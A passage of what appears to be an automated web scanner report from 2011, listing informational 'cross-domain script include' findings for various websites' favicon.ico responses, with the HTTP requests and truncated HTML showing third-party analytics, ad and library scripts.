Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749029; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.4.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749040; expires=Sun, 01-Apr-2012 13:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
</title>

<script src="http://maps.google.com/maps?file=api&v=2&sensor=false&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sfgdata=+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+a" type="text/javascript"></script>
...[SNIP]...
20.26. http://www.lanebryant.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanebryant.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lanebryant.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 60807
Date: Sat, 02 Apr 2011 13:30:58 GMT
Connection: close

<!DOCTYPE html>
<html lang="en">
   <head>
        <link rel="shortcut icon" type="image/x-icon" href="http://www.lanebryant.com/assets/lb/assets/favicon.ico" />

<title>Lane Bryant | Lane Bryant</t
...[SNIP]...
</script><script type="text/javascript" src="http://cts.channelintelligence.com/49058906_landing.js"></script>
...[SNIP]...
20.27. http://www.life123.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.life123.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: wz_cu=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: accepting=1; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: user=l=dir; Domain=.life123.com; Path=/
Content-Length: 58228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Articles and Answers ab
...[SNIP]...
</script><script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
20.28. http://www.menupages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.menupages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Sat, 02 Apr 2011 13:56:11 GMT
Server: Apache
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:01:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 7920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</script>
    <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Cross Pixel Tracking -->
    <script src="http://209.15.236.80/allwebhosts/menupagescom/script.js" ></script>
...[SNIP]...
20.29. http://www.moshimonsters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moshimonsters.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moshimonsters.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: Apache
Last-Modified: Fri, 26 Nov 2010 16:33:06 GMT
ETag: "63e24e-15ef-495f746e95480"-gzip
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive
Content-Length: 5615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta htt
...[SNIP]...
<link rel="shortcut icon" href="http://c.mmcdn.net/static/favicon.png" type="image/x-icon" />
       <script src="http://c.mmcdn.net/versioned/2.23.23/scripts/diablo.js" type="text/javascript"></script>
       <script src="http://c.mmcdn.net/versioned/2.23.23/scripts/engine.js" type="text/javascript"></script>
       <script src="http://c.mmcdn.net/versioned/2.23.23/scripts/swfobject.js" type="text/javascript"></script>
...[SNIP]...
20.30. http://www.mrmovietimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrmovietimes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrmovietimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: ci_session=Pxo%2Fmkc72zw34uGdKefBnTKWnI38vNFuRHZJuWHotgoLiVrWO%2FyS899sVleGDTCa2378J5LwcCx%2FaM3Iu6M9HYM1xNRYhzFD8lxZ46O%2FJ3nwd%2Bvpqrqxx8ftRXSPpmIZDPqJkuft4RfzDbKrA3W82BkFflF8ybcM%2FTTixeL%2Fm%2BrTiDc1eW64DbHWf7ZnUmfNoFYMH%2BNTVkfhzkAj2mnYk68GgXolGs5rItNsbvL1XJxkWq%2FGEKnjXX56nfFb6lHe9BXx0QjVxoyJwfdyq3S0xD7ZfsUzCE4qQl274NwudSsM4sTm5AG5seWG0rEVYqrOX%2BCvbs2RFaiYsOIBYd2tnOcF97iCBmuNqYstGLS9GEo40ZwueXnzLFJSNDQcN3ISMGspPD5cP4Kfiwg7241ktJS%2FoTY4QjL2IHI7fkO0V%2BwELgecc8ERNofDzFzXSuRysvQFytx2y9uu%2BDIejUxyv%2FE6%2B2F4WOFRzPCZHSAXt%2B63j%2FCewbA0HsBZEss7%2F6Xa1IUqt2VF7NLwawkOAm3xJ4j1%2FQPUWHVYJBcl%2BNiisNRgBE%2FLifcI4vGUK6XJbMHrKlkEqCc0Zl%2BJhc1sxp%2FFyKjXbYkb9chz3mP7lmJZHvX8ocsN%2F7Bxrkppf9uyWGrz; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Set-Cookie: locationData=O%3A8%3A%22stdClass%22%3A7%3A%7Bs%3A8%3A%22distance%22%3Bs%3A2%3A%2210%22%3Bs%3A4%3A%22city%22%3BN%3Bs%3A6%3A%22region%22%3BN%3Bs%3A12%3A%22country_code%22%3Bs%3A2%3A%22US%22%3Bs%3A8%3A%22latitude%22%3BN%3Bs%3A9%3A%22longitude%22%3BN%3Bs%3A11%3A%22postal_code%22%3Bs%3A0%3A%22%22%3B%7D; expires=Tue, 30-Mar-2021 14:00:53 GMT; path=/; domain=www.mrmovietimes.com
Set-Cookie: ci_session=BzKboyaJvMSktBeg3pLApmo%2BFi1zrsIVFwSxCPNsxsvMPhZVvVzgu9X6lsdhW6alBUOEFALoOzSWv1gnDLoPPwFI8HHbpddijnLl0f9V1hlJB8y3IxU21tCjPeSPQG4tJ0glFKgdxfty3Sw%2BTMl07BrDpKmlRLjs1cUDtYV%2Bec5pujiLNDKpgdo%2BfD2U2gAxqEntoeEWVNmKXJTJMkeTMjPmZEb7Cw0YHMzACi%2BEZWp7TeahJchMLtAUWr%2BKXhf%2BtfUPpz1Zl%2BvAiNYrsUsMQ1EZHpnW%2BAxq%2BiKZrw7W6014Qrk3yEakON6A445N3w%2FjQNi%2Bbml48X%2B9qkmm1vxaP7pUVZvbL1IUxldnQeCL7CNQqnTyo%2FTCzfnwzEMxkdeK85JfLbLluvLqfhB%2BhLSwhGjVuEMU1KteyLvEmkqPno%2Fht0BU%2FMBs3lVRhJIY5ac2N97zssEY8yACf1CangjgtXAa2KJxkoMFNA079kwj6cJYhCno20FBv8NJ2tdQu36LPzEO1Ye3WsfXedxcQrqIJV6JDwo%2FdsGpuRlqivbBcNLy3tqknO6QATPXaUddfy1calDlp4VxbPYokP0tqreyJiqpDZYuB6Wucxq02VGZKUz2k%2B4e5w2oIZMZxtGt%2B6lpV4OXoVCifK9YpMBxZi0fYe8kIjqT%2B0LFHAr8lxofuhJGCYVDne7%2FrH908Z5Zt%2FeNetYGgoWgTeZlX9d8QPfFwIl99hPNAFlJono6Rio3H4Bi%2FcoKpFcI7foxh4o%2B5Wd2WYvc%2Bfnnhy9cptgpTSQKztlFTaxP%2FREWWwmdhUEijT0JtxX7UrQMKXwG2k3LhiZTgTH6bNpVpkqSSFK3Og1NA2pDRoDXMhTdFsLIj08ox%2BXj88zSIhMZ5fWKKoPH%2FyqWPJlJyugj3x54W3ptgasZZB7ZdGnVfuakUJnYGKrXlTYLkF5suXHLaKMqXqvdzQwH8xMwhxSVIVhkHodESV0ZyGWaWTrrCtyNp2TvVeJXZdQt8J8Noyf4ZnaYHXAqBtAHF%2Fj2U0RwwfkHcUu3M85m6sWhfp4XNaFIZ6Qz%2Fg1Ij%2BRj9bdLXlnzV4u7EZgiVRDWMKGZdW5DbqbcuP4E7LNoRUzrVMKfwDc%2FU6KJLb3C8FI4ssXohIT4LUHPb7xEE9bS; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10698

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

...[SNIP]...
</script>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<!---->    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
20.31. http://www.myrecipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
ETag: "437b78-39-49e76a4611d00"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Content-Length: 24220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Page Not Found |
...[SNIP]...
<![endif]-->
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<!-- /div.footer -->
   <script type="text/javascript" language="javascript" src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
<!-- Quantcast Tag START -->
   <script type='text/javascript' src='http://edge.quantserve.com/quant.js'></script>
...[SNIP]...
20.32. http://www.newport-news.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newport-news.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newport-news.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 43506
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Sat, 02 Apr 2011 13:56:03 GMT
Connection: close


<HTML>
<HEAD>
   <title>Error</title>
   <link rel="stylesheet" type="text/css" href="css/styles.css">
</HEAD>
<body style="padding:0; margin:0;">
<!-- BEGIN FORM -->

<link rel="shortcut
...[SNIP]...
<td align="right" style="height:30px;"><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
20.33. http://www.onemanga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onemanga.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onemanga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 14:06:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: geo_code="178.190.152.95:AT:Austria"; expires=Sun, 03-Apr-2011 14:01:56 GMT; Max-Age=86400; Path=/
Vary: Accept-Encoding
Content-Length: 5622
Age: 291
X-Cache: HIT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<link rel="shortcut icon" href="http://static.s-onemanga.com/manga/favicon3.ico" type="image/x-icon" />
   
<script type="text/javascript" src="http://content.s-onemanga.com/lookup-items.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://content.s-onemanga.com/announcement.js"></script>
...[SNIP]...
<input type="hidden" id="urlStatic" value="http://static.s-onemanga.com" />
<script type="text/javascript" src="http://static.s-onemanga.com/manga/search-autocomplete.js"></script>
...[SNIP]...
20.34. http://www.pga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pga.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:43 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:52:43 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 22957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="ht
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://i2.cdn.turner.com/dr/pga/sites/default/files/js/js_a9b28c0ff012bae216dab4bacabcf1fa.js"></script>
...[SNIP]...
<div class="content">
<script src="http://js.revsci.net/gateway/gw.js?csid=A09801"></script>
...[SNIP]...
<img src="http://gdyn.pga.com/1.1/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)" />
<script type="text/javascript" language="JavaScript1.1" src="http://ar.atwola.com/file/adsEnd.js"></script>
...[SNIP]...
<div class="content">
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/7621/nodetag.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/pga/.element/ssi/js/1.5/global/omniture/jsmd.js"></script>
...[SNIP]...
20.35. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       
       
       <script type="text/javascript" src="http://www.mywebface.com/toolbar/toolbar-v2.2-mws.js"></script>
...[SNIP]...
</script>

       
                                                       <script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak.imgfarm.com/images/anx/anemone.js"></script>
...[SNIP]...
20.36. http://www.skype.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.skype.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
X-Handler: 404.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 33298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
20.37. http://www.suntimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suntimes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suntimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:44 GMT
Server: Apache/2.2.3 (Red Hat)
set-cookie: CSPSESSIONID-SP-80-UP-=000000010000487voeTq000000unSIZmK6gJ43n8m0PT_7Iw--; path=/;
cache-control: no-cache
expires: Thu, 29 Oct 1998 17:04:19 GMT
pragma: no-cache
csp-transfer-encoding: chunked
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: SUNT=SUNT_ECP9; path=/
Content-Length: 127640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...
</script>
   <script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
20.38. http://www.tasteofhome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tasteofhome.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tasteofhome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_headTag"><
...[SNIP]...
</script>
       <script type="text/javascript" language="javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...
<span id="ctl00_ctl03_ConditionalSslContent2"><SCRIPT SRC="http://an.tacoda.net/an/18189/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- End SiteCatalyst code version: H.2. -->


<script src="http://content.dl-rms.com/rms/mother/20844/nodetag.js"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.2. -->


<script src="http://content.dl-rms.com/rms/mother/20844/nodetag.js"></script>
...[SNIP]...
20.39. http://www.teennick.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teennick.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teennick.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 24746
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 14:18:01 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/
Vary: User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Error | Nick.com</title><meta content="" name="description"
...[SNIP]...
</script><script src="http://www.nick.com/global/scripts/overture/sponsored_links_lib.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
<![endif]-->        

   <script src="http://www.nick.com/sbcom/data/kca/okca.jhtml?event=KCA_2011"></script>
...[SNIP]...
<div class="clearfix" id="pageContainer"><script id="90C3FFFF01E323B00002FFFFC390" type="text/javascript" src="http://widgets3.flux.com/Loader" language="javascript"></script>
...[SNIP]...
</div><script src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/1911.js" type="text/javascript"/></body>
...[SNIP]...
20.40. http://www.ufc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufc.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ufc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:06:03 GMT
Content-Length: 54772
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<link rel="shortcut icon" href="http://video.ufc.tv/ufc_system_assets_20110330/images/favicon.ico" />    
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
   <script type="text/javascript" src="https://www.google.com/jsapi?key=ABQIAAAAjw0NXZjCYSfX-ePxoHZLsxSIEFQBKGYGKFcMDzFKHr0vJ-O27hTPSjFKO_IX_9zgd5Qcy9--VQZtTA"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
   <script type="text/javascript" src="http://cufon.shoqolate.com/js/cufon-yui.js"></script>

   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/ITC_Franklin_Gothic.js"></script>

   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery/jquery.jcarousel.min.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery.ufcButtons.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery.mainMenu.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/jquery.searchBox.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/startup.js"></script>
...[SNIP]...
<link rel='stylesheet' type='text/css' href='http://video.ufc.tv/ufc_system_assets_20110330/plugins/grails-ui-1.1.1/js/grailsui/../../css/grailsui/grails-ui.css'/>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/yahoo-dom-event/yahoo-dom-event.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/plugins/grails-ui-1.1.1/js/grailsui/grailsui.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/datasource/datasource-min.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/connection/connection-min.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110330/js/yui/2.7.0/autocomplete/autocomplete-min.js" ></script>
...[SNIP]...
20.41. http://www.usa.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa.gov
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
